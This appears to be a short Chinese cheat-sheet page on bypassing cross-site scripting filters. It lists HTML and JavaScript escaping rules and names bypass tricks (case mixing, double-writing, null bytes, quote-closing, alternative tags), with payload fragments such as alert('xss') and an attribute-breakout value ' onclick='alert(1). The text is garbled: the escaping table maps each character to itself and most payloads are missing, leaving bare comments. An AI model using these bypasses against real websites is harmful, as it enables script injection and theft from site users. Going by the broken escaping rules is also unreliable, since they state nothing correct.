xss利用绕过

xss利用绕过,第1张

XSS绕过 代码过滤

html标签转义规则如下:
< 转成 <
> 转成 >
& 转成 &
" 转成 "
’ 转成 '

javascrpt事件转义规则
\ 转成 \\
/ 转成 \/
; 转成 ;(全角;)

URL属性
如果 //**没有过滤** //**大小写绕过** alert('xss') //**双写绕过** alert('xss') //**空字节绕过** ' onclick='alert(1) //**闭合绕过(对于html实体输入的和过滤< >)** 其他标签绕过

show //链接标签

   //图片xss

 //文档加载完成后
 //图片等媒体加载失败后
 //表单输入